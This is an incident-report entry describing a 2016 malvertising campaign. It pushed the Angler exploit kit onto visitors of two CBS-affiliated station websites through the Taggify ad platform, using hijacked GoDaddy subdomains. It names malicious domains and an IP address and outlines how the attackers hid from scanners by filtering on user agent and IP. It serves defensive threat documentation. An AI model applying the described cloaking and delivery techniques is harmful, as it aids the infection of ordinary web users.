Cyber Incident Victim: CBS-affiliated Television Stations
Date:
May 2016
Location:
United States of America
Summary
A malvertising attack compromised two CBS-affiliated television stations by exploiting the Taggify ad platform, redirecting visitors to the Angler Exploit Kit. A rogue advertiser hijacked GoDaddy accounts to create malicious subdomains that alternated between serving legitimate banners and hidden iframes delivering exploits, evading detection by filtering based on user agents and IPs. The attack targeted genuine users while displaying clean content to automated scanners, exposing them to potential infections. Ongoing at the time of discovery, the incident involved collaboration with the ad platform and domain registrar to mitigate the threat, leveraging domains like som.barkisdesign.com and associated IP addresses for malicious payload distribution.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 4 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On or around May 4, 2016, two CBS-affiliated television stations—KMOV in St. Louis, Missouri, and WBTV in Charlotte, North Carolina—experienced a malvertising incident that exposed their website visitors to the Angler exploit kit. A rogue advertiser compromised the Taggify self-serve advertising platform to inject malicious code into digital ad placements. The attackers employed hijacked GoDaddy accounts to register and configure subdomains that hosted both legitimate-looking banner ads and malicious redirects. These subdomains, including som.barkisdesign.com, operated with dynamic content delivery mechanisms that alternated between serving clean advertisements to web crawlers/scanners and malicious iframes to genuine visitors based on factors like time of day, user agent, and IP reputation. The final payload redirected users through parkwateavereverende.fredricholmgren.se to Angler exploit kit landing pages designed to deliver additional malware.
Malwarebytes researchers identified the ongoing attack chain, documenting its progression from the publisher sites (kmov.com/wbtv.com) through Taggify's data.rtbfy.com ad platform to the malicious infrastructure. The threat actors leveraged IP address 199.255.137.197 for hosting malicious JavaScript. Upon discovery, Malwarebytes notified Taggify, the affected television stations, and GoDaddy to disrupt the attack infrastructure. Taggify collaborated to rapidly contain the incident, halting active infections by May 5. Subsequent monitoring through November 2016 indicated no recurrence of malicious activity via Taggify's platform, with the company implementing enhanced proactive detection systems to prevent similar malvertising campaigns. The incident demonstrated the vulnerability of programmatic advertising ecosystems to credential compromise and domain abuse for exploit kit distribution.